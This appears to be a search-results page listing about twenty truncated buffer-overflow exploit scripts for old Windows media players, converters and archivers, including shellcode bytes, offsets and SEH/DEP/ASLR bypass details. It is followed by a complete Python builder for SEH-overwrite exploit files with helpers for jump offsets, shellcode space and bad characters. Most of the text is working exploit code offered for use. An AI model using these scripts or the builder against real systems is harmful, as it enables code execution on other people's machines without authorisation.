7259 matches found
DVD-X-Player-5.5-Pro-SEH
DVD X Player 5.5 Pro: bypass ASLR by using a non-ASLR-enabled module (SEH overwrite). An egghunter is not needed, as there are at least 2000 bytes for shellcode. import sys print "====================================" print "DVD X Player 5.5 Pro Buffer Overflow" print " SEH Overwrite - Bypass ASLR " print "...
CoolPlayer-Portable-2.19.2-ASLR
Buffer overflow that bypasses ASLR by using a non-ASLR module. Tested against CoolPlayer Portable version 2.19.2 on Windows Vista Business 32-bit. Written by Blake. 233 bytes of space available for shellcode; 227-byte windows/exec shellcode, CMD=calc.exe. shellcode=...
Free-MP3-CD-Ripper-1.1-DEP
Exploit Title: Free MP3 CD Ripper 1.1 Universal DEP Bypass Exploit. Date: 27/08/2011. Author: C4SS!0 G0M3S. Software Link: http://www.brothersoft.com/free-mp3-cd-ripper-84543.html. Version: 1.1. from struct import pack from time import sleep import os from sys import exit print ''' Created By C4SS!0...
MP3-CD-Converter-Professional-5.3.0
Exploit Title: MP3 CD Converter Professional Universal DEP Bypass Exploit. Date: 11/08/2011. Author: C4SS!0 G0M3S. Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe. from struct import pack from time import sleep from sys import exit print ''' Created By C4SS!0 G0M3S E-mail...
BlazeVideo-HDTV-Player-multi
Take a look at mona.py, an awesome tool developed by corelanc0d3r and his team: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/. This is the old-fashioned bug; I just tried to make it universal. It has also been exploited by: import struct file = 'blazevideo-universal.plf' totalsize =...
AVCon-DEP-Bypass
DEP bypass for OptIn/OptOut; all modules used are not ASLR-aware. The script produces a text file: copy the contents and paste them into the input field next to the Call button. Discovered by Dillon Beresford. import sys from struct import pack. Around 619 bytes of space before the SEH overwrite; if more space is needed,...
MY-MP3-Player-3.0-m3u
Written to bypass the OptIn/OptOut DEP policy; tested on Windows XP SP3 running in VirtualBox. import sys. calc.exe - 1014 bytes of space for shellcode. shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"...
Mini-Stream-Ripper-2.9.7-DEP
Written to bypass the OptIn/OptOut DEP policy; tested on Windows XP SP3 running in VirtualBox. import sys. calc.exe shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"...
Wav-Player-1.1.3.6-(.pll)
Open the wav player, make a playlist and save it. Then close the player and run this exploit to create the new playlist. When you open wav player again, you will see calc. fichero = open("wvplayer.pll", "w") print "+ Creating exploit .pll..." fichero.write("A"*1034) # Padding fichero.write"t%dA" he...
CCMPlayer-1.5-Stack-based
Exploit: CCMPlayer 1.5 Stack-based Buffer Overflow SEH Exploit (.m3u). Date: 30 Nov 2011. Author: Rh0. Software: CCMPlayer 1.5. m3u = "C:\" shellcode m3u p/p/r m3u. Songs - Add - Files of type: m3u - msf.m3u = exploit file. create m3u...
GOM-Player-2.1.33.5071-ASX-File-Unicode
Exploit Title: GOM Player Crafted ASX File Unicode Stack Buffer Overflow and Arbitrary Code Execution. Version: 2.1.33.5071. Date: 30-11-2011. Author: Debasish Mandal. Peter Van Eeckhoutte (corelanc0d3r). raw_input(" Press Enter to generate the crafted ASX...") size = 2046 # Shellcode: WinExec "Calc.exe"...
Office-2008-sp0-RTF-Pfragments
RTF Pfragments exploit for Mac Office 2008. Advanced Hacking Trainings - http://training.aslitsecurity.com. Web - http://www.aslitsecurity.com/. Blog - http://www.aslitsecurity.blogspot.com/. Office 2007 for Mac SP 0. myfile = "\x7b\x5c\x72\x74\x66\x31\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7b"...
Mini-stream-RM-MP3-Converter-3.1.2.2
Author: SkY-NeT SySteMs. Software Link: http://mini-stream.net/rm-to-mp3-converter/download/. Version: 3.1.2.2. Tested on: XP SP2. import os,sys header= "http://." junk= "\x41" * 17416 # A ESP = "\x13\x44\x87\x7C" # 7C874413 FFE4 JMP ESP NOPS = "\x90" * 16 ShellCode =...
Blade-API-Monitor-Unicode-Bypass
This is a super strange exploit. First I would like to commend "FullMetalFouad" for the Unicode work on the original exploit. Originally I wanted to see if I could simplify the process. While I was doing that, I lost sight of the fact that the instructions had to be printable, since we need to copy...
Lattice-Semiconductor-PAC-Designer-6.21
Exploit: Lattice Semiconductor PAC-Designer 6.21 (possibly all versions). CVE: CVE-2012-2915. Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/. OS: WinXP SP1. Software: http://www.latticesemi.com/products/designsoftware/pacdesigner/index.cfm. filename="evil.PAC" PAC1 = """ 1 ispPAC-CLK5410D...
FormatFactory-3.0.1-Profile
Exploit Title: FormatFactory v3.0.1 Profile File Handling Buffer Overflow. Version: 3.0.1. Date: 2012-11-19. Author: Julien Ahrens (@MrTuxracer). Homepage: http://www.inshell.net. from struct import pack file="profile.ini" junk1="\xCC" * 260 nseh="\xeb\x06\x90\x90" eip=pack('L',0x024C1923) # CALL DWORD PTR...
Zoner-Photo-Studio-15-Build-3
Exploit Title: Zoner Photo Studio v15 Build 3 Zps.exe Registry Value Parsing Local Buffer Overflow. Version: 15 Build 3, Build 2. Date: 2012-11-09. Author: Julien Ahrens. from struct import pack file="poc.reg" junk1="\xCC" * 2136 nseh="\xeb\x06\x90\x90" eip=pack('L',0x0C7D8F13) # JMP DWORD PTR SS:[EBP-18] -...
NCMedia-Sound-Editor-Pro-7.5.1
Exploit Title: NCMedia Sound Editor Pro v7.5.1 MRUList201202.dat File Handling Local Buffer Overflow. Version: 7.5.1. Date: 2012-08-07. Author: Julien Ahrens. Website: http://www.inshell.net. Software Link: http://www.soundeditorpro.com/. from struct import pack file="MRUList201202.dat" windows/exec...
FuzeZip-1.0.0.131625-SEH
Date: 16.Apr.2013. Vulnerability reported. Exploit Authors: Josep Pi Rodriguez, Pedro Guillen Nunez, Miguel Angel de Castro Simon. Organization: RealPentesting. Vendor Homepage: http://fuzezip.com/. Software Link: http://download.fuzezip.com/FuzeZipSetup.exe. Version: 1.0.0.131625. header1 =...
WinArchiver-3.2-SEH
Exploit Title: WinArchiver v3.2 SEH Overflow. Date: April 24, 2013. Exploit Authors: Josep Pi Rodriguez, Pedro Guillen Nunez, Miguel Angel de Castro Simon. Organization: RealPentesting. Vendor Homepage: http://winarchiver.com. Software Link: http://www.winarchiver.com/WinArchiver3.exe. zipheader =...
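Several of the entries above (DVD X Player, CCMPlayer, FormatFactory, Zoner Photo Studio, FuzeZip, WinArchiver) share one SEH-overwrite layout: filler up to the nSEH slot, a short jump in nSEH, a POP/POP/RET address from a non-ASLR, non-SafeSEH module in the handler slot, then a NOP sled and shellcode. The Python 3 builder below is an added example and is not code from any of the listed exploits; the offset, POP/POP/RET address, maximum input length, bad-character set, shellcode stub and output file name are placeholder assumptions that must be replaced with values found in a debugger (for instance with mona.py, which the BlazeVideo entry points to).

```python
import struct

# Added example: generic SEH-overwrite file builder. Every offset, address and
# shellcode below is a PLACEHOLDER assumption, not taken from any listed exploit;
# real values come from a debugger (e.g. mona.py: !mona findmsp, !mona seh).
OFFSET_TO_NSEH = 1034            # assumed distance from buffer start to nSEH
PPR_ADDRESS = 0x10203040         # assumed POP/POP/RET in a non-ASLR, non-SafeSEH module
MAX_INPUT = 3000                 # assumed number of bytes the target copies
BAD_CHARS = b"\x00\x0a\x0d"      # assumed bytes the parser will not pass through
SHELLCODE = b"\xcc" * 32         # INT3 stub standing in for msfvenom output

# nSEH: "jmp short +6" skips the two padding NOPs and the 4-byte handler pointer.
NSEH = b"\xeb\x06\x90\x90"


def jump_target(offset_to_nseh):
    """Offset the short jump lands on: EIP after the 2-byte jmp, plus rel8 of +6."""
    return offset_to_nseh + 2 + 6


def shellcode_space(max_input, offset_to_nseh):
    """Bytes left after the SEH record (nSEH + handler pointer = 8 bytes)."""
    return max_input - (offset_to_nseh + len(NSEH) + 4)


def needs_egghunter(max_input, offset_to_nseh, shellcode, nop_sled=16):
    """True when sled + shellcode do not fit after the SEH record."""
    return shellcode_space(max_input, offset_to_nseh) < nop_sled + len(shellcode)


def bad_chars_in(data, bad=BAD_CHARS):
    """Sorted list of bad byte values present in data (should be empty)."""
    return sorted({b for b in data if b in bad})


def build_seh_payload(offset_to_nseh, ppr, shellcode, max_input, nop_sled=16, filler=b"A"):
    """Layout: filler | nSEH | SEH (POP/POP/RET) | NOP sled | shellcode | filler."""
    seh = struct.pack("<I", ppr)                       # little-endian address
    payload = filler * offset_to_nseh + NSEH + seh + b"\x90" * nop_sled + shellcode
    if len(payload) > max_input:
        raise ValueError("shellcode does not fit after SEH; consider an egghunter")
    payload += filler * (max_input - len(payload))     # keep the crash-length constant
    return payload


def check_layout(payload, offset_to_nseh, ppr):
    """Sanity-check: records in place, jump lands on the sled, no bad chars anywhere."""
    seh_at = offset_to_nseh + len(NSEH)
    ok_nseh = payload[offset_to_nseh:seh_at] == NSEH
    ok_seh = payload[seh_at:seh_at + 4] == struct.pack("<I", ppr)
    ok_jump = payload[jump_target(offset_to_nseh)] == 0x90
    return ok_nseh and ok_seh and ok_jump and not bad_chars_in(payload)


if __name__ == "__main__":
    payload = build_seh_payload(OFFSET_TO_NSEH, PPR_ADDRESS, SHELLCODE, MAX_INPUT)
    assert check_layout(payload, OFFSET_TO_NSEH, PPR_ADDRESS)
    with open("poc.m3u", "wb") as f:       # output file name is an assumption
        f.write(payload)
```

The jump_target helper is why nSEH is "\xeb\x06\x90\x90" in so many of these scripts: when the handler returns into the POP/POP/RET gadget, execution lands on the nSEH bytes, the 2-byte jmp is relative to the instruction after it, so +6 skips the two trailing NOPs and the 4-byte handler pointer and arrives exactly at the sled. shellcode_space reproduces the "N bytes for shellcode" figures the entries quote and decides whether an egghunter is required, and check_layout catches the usual mistakes (an address containing a bad byte, or a sled that the jump misses) before the file ever reaches the target.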